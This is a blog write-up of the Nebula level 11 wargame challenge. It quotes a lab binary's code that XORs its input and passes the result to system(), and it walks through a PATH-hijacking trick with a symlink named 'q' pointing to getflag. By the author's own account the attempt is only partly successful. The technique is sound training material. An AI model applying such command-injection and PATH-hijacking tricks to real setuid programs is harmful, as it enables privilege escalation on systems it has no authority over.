Exploit-Education Nebula Level 11

2 minute read

Exploit Education Level 11

Challenge

The /home/flag11/flag11 binary processes standard input and executes a shell command. There are two ways of completing this level, you may wish to do both :-) To do this level, log in as the level11 account with the password level11. Files for this level can be found in /home/flag11.

The binary accepts an input from the user and if the input contains the header Content-length: it takes the number after the header and does a check.

if(length < sizeof(buf)) {
if(fread(buf, length, 1, stdin) != length) {
err(1, "fread length");
}
process(buf, length);
}

If the size is less than 1024 it accepts further input and once the length has reached calls process.

The level can be completed in 2 ways. First way is when is length is less than 1024.

Vulnerabilty

The vulnerability is in the function process

void process(char *buffer, int length)
{
  unsigned int key;
  int i;

  key = length & 0xff;

  for(i = 0; i < length; i++) {
      buffer[i] ^= key;
      key -= buffer[i];
  }

  system(buffer);
}

The process xors the data and then calls system. Lets try running the program few times.
test contains the letter q

level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
sh: q: command not found
level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
sh: q: command not found
level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
sh: $'qP\312': command not found
level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
sh: $'q\360\342': command not found
level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
sh: q: command not found
level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
sh: -c: line 0: unexpected EOF while looking for matching ``'
sh: -c: line 1: syntax error: unexpected end of file
level11@nebula:/home/flag11$ cd /home/level11

We can see that the program is trying to execute the command q but the encryption is changing it into something else. But we can see a repeating pattern. Sometimes the program is encrypting q as q

level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
sh: q: command not found

We can use this. If we create a program named q and add a symlink we can execute any program.

Solution

level11@nebula:~$ touch q
level11@nebula:~$ which getflag
/bin/getflag
level11@nebula:~$ ln -s /bin/getflag q
level11@nebula:~$ PATH=/home/level11/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
level11@nebula:~$ q
getflag is executing on a non-flag account, this doesn't count

Okay so now q points to getflag Lets try running the program again

level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
sh: $'q\240\200': command not found
level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
sh: -c: line 0: unexpected EOF while looking for matching `"'
sh: -c: line 1: syntax error: unexpected end of file
level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
sh: $'q\360A': command not found
level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
sh: $'q\200\377': command not found
level11@nebula:/home/flag11$ ./flag11 < /home/level11/test
getflag is executing on a non-flag account, this doesn't count

We successfully executed getflag but its saying its being executed by a non flag account. But our program has setuid. So I assume that there is any error in the program.
I haven’t figured out the second method yet.

Kinda Solved!

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.